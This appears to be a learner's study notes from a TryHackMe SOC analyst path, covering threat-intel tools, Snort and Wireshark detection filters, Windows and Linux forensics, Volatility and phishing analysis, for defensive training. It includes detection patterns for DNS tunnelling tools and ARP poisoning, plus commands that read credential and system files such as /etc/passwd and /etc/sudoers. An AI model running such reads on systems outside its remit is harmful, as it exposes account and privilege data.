~/THM/ SOC L1 Path

Some notes from SOC L1 Path

Cyber Defence Frameworks

C2 (Command and Control) : Beaconing Shadow Copy is a Microsoft technology that can create backup copies, snapshots of computer files, or volumes. Threat modelling is a series of steps to ultimately improve the security of a system

Adversary Operator is the “hacker” or person(s) conducting the intrusion activity. Adversary Customer is the entity that stands to benefit from the activity conducted in the intrusion

Cyber Threat Intelligence

Data: Discrete indicators associated with an adversary, such as IP addresses, URLs or hashes.

Information: A combination of multiple data points that answer questions such as “How many times have employees accessed tryhackme.com within the month?”

Intelligence: The correlation of data and information to extract patterns of actions based on contextual analysis.

Urlscan.io is a free service developed to assist in scanning and analysing websites Abuse.ch is a research project developed to identify and track malware and botnets through several operational platforms developed under the project

Malware Bazaar: A resource for sharing malware samples. Feodo Tracker: A resource used to track botnet command and control (C2) infrastructure linked with Emotet, Dridex and TrickBot. SSL Blacklist: A resource for collecting and providing a blocklist for malicious SSL certificates and JA3/JA3s fingerprints. URL Haus: A resource for sharing malware distribution sites. Threat Fox: A resource for sharing indicators of compromise (IOCs).

Yara [Loki ,yarGen] --> search for strings in malware analysis Valhalla is an online Yara feed created and hosted by Nextron-Systems

OpenCTI is another open-sourced platform designed to provide organisations with the means to manage CTI through the storage, analysis, visualisation and presentation of threat campaigns, malware and IOCs.

MISP (Malware Information Sharing Platform) is an open-source threat information platform that facilitates the collection, storage and distribution of threat intelligence and Indicators of Compromise (IOCs) related to malware, cyber attacks, financial fraud or any intelligence within a community of trusted members.

Network Security and Traffic Analysis

SOAR:Technology that helps coordinate and automates tasks between various people, tools, and data within a single platform to identify anomalies, threats, and vulnerabilities. It also supports vulnerability management, incident response, and security operations

Snort is the foremost Open Source Intrusion Prevention System (IPS) in the world. //(IP, TCP, UDP and ICMP)\ Snort IPS uses a series of rules that help define malicious network activity and uses those rules to find packets that match against them and generate alerts for users

There are four main types of IPS systems: 1] Network Intrusion Prevention System (NIPS) 2] Behaviour-based Intrusion Prevention System (Network Behaviour Analysis - NBA) [ require a training period (also known as "baselining")] 3] Wireless Intrusion Prevention System (WIPS) 4] Host-based Intrusion Prevention System (HIPS)

The TCP flags: F - FIN S - SYN R - RST P - PSH A - ACK U - URG

local.rules --> alert tcp any 80 <> any any (msg:”TCP port 80 found”; sid:100001; rev:1;) Terminal --> sudo snort -c local.rules -A full -l . -r mx-3.pcap open log --> sudo snort -r snort.log.1671720080 [-n (packet numper)] multiple --> alert tcp any 21 <> any any (msg:"FTP Failed Admin Login-Bad or No Password"; content:"331 Password"; fast_pattern ; content:"Administrator"; sid:100006; rev:1;)

NetworkMiner is an open-source traffic sniffer, pcap handler and protocol analyser. Developed and still maintained by Netresec. NetworkMiner: -Don't use this tool as a primary sniffer. -Use this tool to overview the traffic, then move forward with Wireshark and tcpdump for a more in-depth investigation.

Zeek (formerly Bro) is an open-source and commercial network monitoring tool (traffic analyser). zeek -C -r http.pcap -s http-password.sig zeek -C -r ftp.pcap 201.zeek -s ftp-admin.sig readable --> cat conn.log | zeek-cut uid proto id.orig_h id.orig_p id.resp_h id.resp_p https://try.bro.org/#/?example=hello [ Zeek's official training platform ]

BRIM is an open-source desktop application that processes pcap files and logs files. Its primary focus is providing search and analytics The common best practice is handling medium-sized pcaps with [Wireshark], creating logs and correlating events with [Zeek], and processing multiple logs in [Brim].

Wireshark is one of the most potent traffic analyser tools available in the wild. There are multiple purposes for its use:

-Detecting and troubleshooting network problems, such as network load failure points and congestion. -Detecting security anomalies, such as rogue hosts, abnormal port usage, and suspicious traffic. -Investigating and learning protocol details, such as response codes and payload data.

Note: Wireshark is not an Intrusion Detection System (IDS). It only allows analysts to discover and investigate the packets in depth. It also doesn't modify packets; it reads them. Hence, detecting any anomaly or network problem highly relies on the analyst's knowledge and investigation skills.

Get hash of any file --> md5sum ~/Desktop/{Name of the file you just extracted}

Advanced Filtering: -http.server [contains] "Apache" -http.host [matches] ".(php|html)" -tcp.port [in] {80 443 8080} -upper(http.server) contains "APACHE" -lower(http.server) contains "apache" -string(frame.number) matches "[13579]$"

Nmap Scans

TCP SYN scan filter : [tcp.flags.syn==1 and tcp.flags.ack==0 and tcp.window_size <= 1024] UDP : closed port returns ICMP Type 3, Code 3 message. (Destination unreachable, port unreachable) filter [icmp.type==3 and icmp.code==3]

ARP Poisoning/Spoofing (A.K.A. Man In The Middle Attack)

The ultimate aim is to manipulate the "IP to MAC address table" suspicious --> The duplicate value to highlight the conflict. --> The MAC address that ends with "b4" is the destination of all HTTP packets!

Opcode 1: ARP requests --> arp.opcode == 1 Opcode 2: ARP responses --> arp.opcode == 2 Hunt: Arp scanning --> arp.dst.hw_mac==00:00:00:00:00:00 Hunt: Possible ARP poisoning detection --> arp.duplicate-address-detected or arp.duplicate-address-frame Hunt: Possible ARP flooding from detection --> ((arp) && (arp.opcode == 1)) && (arp.src.hw_mac == target-mac-address)

Identifying Hosts: DHCP, NetBIOS and Kerberos

"DHCP Request" packets contain the hostname information --> [dhcp.option.dhcp == 3] "DHCP ACK" packets represent the accepted requests --> [dhcp.option.dhcp == 5] "DHCP NAK" packets represent denied requests --> [dhcp.option.dhcp == 6]

-dhcp.option.hostname contains "keyword" "DHCP Request" -dhcp.option.domain_name contains "keyword" "DHCP ACK"

NetBIOS or Network Basic Input/Output System is the technology responsible for allowing applications on different hosts to communicate with each other. Query details could contain "name, Time to live (TTL) and IP address details" --> nbns.name contains "keyword"

Kerberos is the default authentication service for Microsoft Windows domains. It is responsible for authenticating service requests between two or more computers over the untrusted network. The ultimate aim is to prove identity securely.

-CNameString: The username --> kerberos.CNameString and !(kerberos.CNameString contains "$" ) [ "$" are hostnames, and the ones without it are user names]

Tunnelling Traffic: ICMP and DNS

  • Regular Packet length [64 bytes]

"ICMP" options for grabbing the low-hanging fruits: [data.len > 64 and icmp] -Packet length. -ICMP destination addresses. -Encapsulated protocol signs in ICMP payload.

"DNS" options for grabbing the low-hanging fruits:

  • dns contains "dnscat" [dnscat and dns2tcp]

  • dns.qry.name.len > 15 and !mdns [Disable local link device queries.]

-Query length. -Anomalous and non-regular names in DNS addresses. -Long DNS addresses with encoded subdomain addresses. -Known patterns like dnscat and dns2tcp. -Statistical analysis like the anomalous volume of DNS requests for a particular target.

ftp.request.command == "RETR" “RETR” is used to retrieve (or download) files or documents from the FTP server “STOR” ftp command for the uploaded file

HTTPS uses TLS protocol to encrypt communications

Endpoint protection & monitoring

  • The System process (process ID 4) is the home for a special kind of thread that runs only in kernel mode a kernel-mode system thread.

  • smss.exe (Windows Session Manager), is responsible for creating new sessions. It is the first user-mode process started by the kernel.

  • csrss.exe (Client Server Runtime Process) [created by smss.exe]is the user-mode side of the Windows subsystem. This process is responsible for the Win32 console window and process thread creation and deletion

  • wininit.exe is responsible for launching [ services.exe (Service Control Manager), lsass.exe (Local Security Authority) ]

  • services.exe Its primary responsibility is to handle system services: loading services, interacting with services and starting or ending services.

  • svchost.exe The Service Host (Host Process for Windows Services) is responsible for hosting and managing Windows services.

  • Local Security Authority Subsystem Service (LSASS) is a process responsible for enforcing the security policy on the system

  • The Windows Logon, winlogon.exe, is responsible for handling the Secure Attention Sequence (SAS). It is the ALT+CTRL+DELETE key combination .

  • Windows Explorer, explorer.exe. This process gives the user access to their folders ,files ,the Start Menu and Taskbar.

  • Sigcheck : is a command-line utility that shows file version number, timestamp information, and digital signature details, including certificate chains. It also includes an option to check a file’s status on VirusTotal, a site that performs automated file scanning against over 40 antivirus engines, and an option to upload a file for scanning.

  • Streams : "The NTFS file system provides applications the ability to create alternate data streams of information. By default, all data is stored in a file's main unnamed data stream, but by using the syntax 'file:stream', you are able to read and write to alternates."

  • SDelete is a command line utility that takes a number of options. In any given use, it allows you to delete one or more files and/or directories, or to cleanse the free space on a logical disk.

  • TCPView is a Windows program that will show you detailed listings of all TCP and UDP endpoints on your system, including the local and remote addresses.

  • Autoruns :This is a good tool to search for any malicious entries created in the local machine to establish Persistence.

  • ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike.

-Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity. It combines the features of two legacy Sysinternals utilities, Filemon and Regmon

Events to monitor link : https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l--events-to-monitor Want to detect if a new service was installed? Look for Event ID [ 7045 ] within the System Log Maybe you want to monitor if a firewall rule was deleted from the host. That is Event ID [ 2006/2033 ].

Osquery is an open-source agent created by Facebook in 2014. It converts the operating system into a relational database. It allows us to ask questions tables using SQL queries, like returning the list of running processes, a user account created on the host, and the process of communicating with certain suspicious domains.

sudo systemctl enable auditd.service : run service on boot

Security Information and Event Management

SIEM stands for Security Information and Event Management system

| stats count(src_ip) as Requests by src_ip : count Requests

| sort - Requests : sort Requests

| table _time uri src dest_ip form_data : create table of ( time , uri , src ip , dest ip , form data)

index=botsv1 sourcetype=stream:http dest_ip="192.168.250.70" *.exe : installation phase

https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon : Events IDs

[ Robtex[https://www.robtex.com/] , Virustotal , whois[ whois.domaintools.com] , ThreatMiner , Hybrid-Analysis ] : for more info about the adversary

Search for the suspicious domains at https://otx.alienvault.com

Summary of "botsv1" : botsv1.txt

sysmon [Event IDs] Event ID 1 : Process Creation Event ID 3 : Network Connection : events that occur remotely Event ID 4720 : A user account was created Event ID 12 : RegistryEvent (Object create and delete) Event ID 4688 : A new process has been created Event ID 4103 : We can detect PowerShell activities by using the filter.

Digital Forensics and Incident Response

Artifacts : are pieces of evidence that point to an activity performed on a system. Evidence Preservation : we must maintain the integrity of the evidence we are collecting Chain of custody : When the evidence is collected, it must be made sure that it is kept in secure custody Order of volatility : Digital evidence is often volatile, i.e., it can be lost forever if not captured in time. Timeline creation : We need to present them understandably to fully use the information contained in them

The majority of these hives are located in the C:\Windows\System32\Config directory and are:

  • DEFAULT (mounted on HKEY_USERS\DEFAULT)

  • SAM (mounted on HKEY_LOCAL_MACHINE\SAM)

  • SECURITY (mounted on HKEY_LOCAL_MACHINE\Security)

  • SOFTWARE (mounted on HKEY_LOCAL_MACHINE\Software)

  • SYSTEM (mounted on HKEY_LOCAL_MACHINE\System)

Eric Zimmerman's tools

  • (PECmd.exe) : We can use Prefetch Parser [ PECmd.exe -f --csv ] --> C:\Windows\Prefetch

  • WxTCmd.exe : for parsing Windows 10 Timeline. [WxTCmd.exe -f --csv ] --> C:\Users<username>\AppData\Local\ConnectedDevicesPlatform{randomfolder}\ActivitiesCache.db

  • JLECmd.exe : go directly to their recently used files from the taskbar --> C:\Users<username>\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations

  • LECmd.exe : (Lnk Explorer) to parse Shortcut files [C:\Users<username>\AppData\Roaming\Microsoft\Office\Recent]

EZtools --> to read .csv files kape --> prepare files

setupapi.dev.log : artifact will tell us the first and last connection times of a removable drive

C:\Users\hp\AppData\Local\Microsoft\Windows: HISTORY C:\Windows\AppCompat\Programs\Amcache.hve : Windows creates this hive to save information on programs that were recently run on the system.

In summary,the bits that make up a file are stored in clusters.All the filenames on a file system, their starting clusters, and their lengths are stored in directories. And the location of each cluster on the disk is stored in the File Allocation Table Later,the storage needed to be increased, FAT12, FAT16, and FAT32 were introduced

The NTFS file system

  • Journaling : The NTFS file system keeps a log of changes to the metadata in the volume.

  • Access Controls : The FAT file system did not have access controls based on the user.

  • Volume Shadow Copy : ransomware actors have been noted to delete the shadow copies on a victim's file systems to prevent them from recovering their data.

  • Alternate Data Streams : Alternate data streams (ADS) is a feature in NTFS that allows files to have multiple streams of data stored in a single file.

$MFT :is the first record in the volume. The Volume Boot Record (VBR) points to the cluster where it is located. $MFT stores information about the clusters where all other objects present on the volume are located. This file contains a directory of all the files present on the volume.

  • MFTECmd.exe -f C:\Users\THM-4n6\Desktop\triage\C$BOOT [read in cmd]

  • MFTECmd.exe -f C:\Users\THM-4n6\Desktop\triage\C$MFT -csv C:\Users\THM-4n6\Desktop [read in .cve (EZviewer)]

Linux

  • OS release info : cat /etc/os-release

  • User accounts : cat /etc/passwd| column -t -s :

  • Group Info : cat /etc/group

  • Sudoers List : sudo cat /etc/sudoers

  • Login info : sudo last -f /var/log/ [wtmp , btmp]

  • Authentication logs : cat /var/log/auth.log | tail [make it easier to read.]

  • Hostname : cat /etc/hostname

  • Timezone : cat /etc/timezone

  • Network Configuration : cat /etc/network/interfaces

  • Active network connections : netstat -natp

  • Running processes : ps aux [ps aux | grep Xtigervnc]

  • DNS info : cat /etc/hosts

  • Cron jobs : cat /etc/crontab [ information about the time interval after which the command has to run ]

  • Service startup : ls /etc/init.d/ [start and run in the background after every system boot]

  • .Bashrc : cat ~/.bashrc [When a bash shell is spawned, it runs the commands stored in the .bashrc file] : cat ~/.bash_history [Any commands other than the ones run using sudo are stored in the bash history]

  • Sudo execution history : cat /var/log/auth.log* |grep -i COMMAND|tail [required information from the auth log]

  • vim : cat ~/.viminfo

  • Syslog : cat /var/log/syslog* | head [ contains messages that are recorded by the host about system activity, all of the syslogs, use (*) wildcard.]

  • Auth logs : cat /var/log/auth.log* | head []

  • Third-party : ls /var/log [third-party applications such as webserver, database, or file share server logs.] : ls /var/log/apache2/ [if any database server like MySQL is installed on the system, we can find the logs in this directory.]

Redline

  • Standard Collector : this method configures the script to gather a minimum amount of data for the analysis. It is also usually the fastest method to collect the data you need. It takes only a few minutes to complete.

  • Comprehensive Collector : this method configures the script to gather the most data from your host for further analysis. This method takes up to an hour or more. You will choose this method if you prefer the full analysis of the system.

  • IOC Search Collector (Windows only) - this method collects data that matches with the Indicators of Compromise (IOCs) that you created with the help of IOC Editor. You will choose this method if you want to run the data collection against known IOCs that you have gathered either through threat intelligence (data feed or narrative report), incident response, or malware analysis.

  • IOC stands for Indicators of Compromise; they are artifacts of the potential compromise and host intrusion on the system or network that you need to look for when conducting threat hunting or performing incident response. IOCs can be [MD5, SHA1, SHA256 hashes, IP address, C2 domain, file size, filename, file path, a registry key, etc.]

.bmp : extention for desktop wallpaper

KAPE

KAPE serves two primary purposes,

1) collect files 2) process the collected files as per the provided options

Volatility

Volatility is the world's most widely used framework for extracting digital artifacts from volatile memory (RAM) samples.

Five different plugins

  • vol -f 'dump.vmem' windows.info [basic info ]

  • vol -f 'dump.vmem' windows.pslist [all current processes and terminated processes ]

  • vol -f 'dump.vmem' windows.psscan [Some malware, typically rootkits. locate processes by finding data structures that match _EPROCESS]

  • vol -f 'dump.vmem' windows.pstree [list all processes based on their parent process ID]

  • vol -f 'dump.vmem' windows.dlllist [filter output to a specific DLL that might be an indicator for a specific type of malware]

  • vol -f 'dump.vmem' windows.malfind [identify injected processes and their PIDs]

  • vol -f 'dump.vmem' windows.yarascan [search for strings, patterns, and compound rules against a rule set]

  • vol -f 'dump.vmem' windows.ssdt [System Service Descriptor Table;hook into this table and modify pointers to point to a location the rootkit]

  • vol -f 'dump.vmem' windows.modules [ identifying active malware. However, if a malicious file is idly waiting or hidden, this plugin may miss it]

  • vol -f 'dump.vmem' windows.driverscan [identify driver files in the kernel that the modules plugin might have missed or were hidden] = Outher plugins --> [modscan driverirp callbacks idt apihooks moddump handles]

Velociraptor

endpoint monitoring, digital forensic and cyber response platform

TheHive Project

Three core functions:

  • Collaborate: Multiple analysts from one organisation can work together on the same case simultaneously.

  • Elaborate: Investigations correspond to cases. The details of each case can be broken down into associated tasks

  • Act: A quick triaging process can be supported by allowing analysts to add observables to their cases, leveraging tags, flagging IOCs

Malware is derived from the term MALicious softWARE

Take the following precautions while analyzing malware:

  • Never analyze malware or suspected malware on a machine that does not have the sole purpose of analyzing malware.

  • When not analyzing or moving malware samples around to different locations, always keep them in password-protected zip/rar or other archives so that we can avoid accidental detonation.

  • Only extract the malware from this password-protected archive inside the isolated environment, and only when analyzing it.

  • Create an isolated VM specifically for malware analysis, which has the capability of being reverted to a clean slate once you are done.

  • Ensure that all internet connections are closed or at least monitored.

  • Once you are done with malware analysis, revert the VM to its clean slate for the next malware analysis session to avoid residue from a previous malware execution corrupting the next one.

When malware is analyzed without being executed, it is called Static Analysis. Dynamic analysis techniques include running the malware in a VM

file type : file Examining Strings : strings Calculating Hashes : md5sum,sha1sum,sha256sum PE Header information pecheck has extracted from the PE header of the wannacry sample : pecheck

Cuckoo's sandbox is the most widely known sandbox in the malware analysis community CAPE Sandbox is a little more advanced version of Cuckoo's sandbox. Online --> Analyzing samples using [ Hybrid Analysis ]

Phishing Analysis Fundamentals

There are 3 specific protocols involved to facilitate the outgoing and incoming email messages, and they are briefly listed below.

  • SMTP (Simple Mail Transfer Protocol) - It is utilized to handle the sending of emails. [ port 25 ]

  • POP3 (Post Office Protocol) - Is responsible transferring email between a client and a mail server. [downloaded (POP3)]

  • IMAP (Internet Message Access Protocol) - Is responsible transferring email between a client and a mail server. [copied (IMAP)]

where can you retrieve more information about the IP --> http://www.arin.net/

  • Spam - unsolicited junk emails sent out in bulk to a large number of recipients. The more malicious variant of Spam is known as MalSpam.

  • Phishing - emails sent to a target(s) purporting to be from a trusted entity to lure individuals into providing sensitive information.

  • Spear phishing - takes phishing a step further by targeting a specific individual(s) or organization seeking sensitive information.

  • Whaling - is similar to spear phishing, but it's targeted specifically to C-Level high-position individuals (CEO, CFO, etc.), and the objective is the same.

  • Smishing - takes phishing to mobile devices by targeting mobile users with specially crafted text messages.

  • Vishing - is similar to smishing, but instead of using text messages for the social engineering attack, the attacks are based on voice calls.

A BEC ( business email compromise ) is when an adversary gains control of an internal employee's account and then uses the compromised email account to convince other internal employees to perform unauthorized or fraudulent actions.

BCC (Blind Carbon Copy) : when sending an email message to a large number of people. When you place email addresses in the BCC field of a message, those addresses are invisible to the recipients of the email.

Messageheader : https://toolbox.googleapps.com/apps/messageheader/analyzeheader Message Header Analyzer : https://mha.azurewebsites.net/ mailheader.org

[ IPinfo.io: https://ipinfo.io/ ] --> scan IPs [ URLScan.io: https://urlscan.io/ ] --> scan sites [Domains] [ URL2PNG ] and [ Wannabrowser ] Talos Reputation Center: https://talosintelligence.com/reputation URL Extractor: https://www.convertcsv.com/url-extractor.htm

Some of these online malware sandboxes are listed below.

  • Any.Run: https://app.any.run/

  • Hybrid Analysis: https://www.hybrid-analysis.com/

  • Joe Sandbox : https://www.joesecurity.org/

More tools

  • https://mxtoolbox.com/

  • https://phishtank.com/?

  • https://www.spamhaus.org/

Defender Actions

  • Sender Policy Framework (SPF) : Internet Service Providers can verify that a mail server is authorized to send email for a specific domain.

  • DomainKeys Identified Mail (DKIM) : is used for the authentication of an email that’s being sent , DKIM’s advantage is that it can survive forwarding.

  • DMARC (Domain-based Message Authentication Reporting, & Conformance) : feedback that will allow you to troubleshoot your SPF and DKIM configurations if needed. Let's use the Domain Health Checker from [ dmarcian.com ] and check the DMARC status of site.com.

PreviousInitial accsesNext~/THM/ SOC L2 Path

Last updated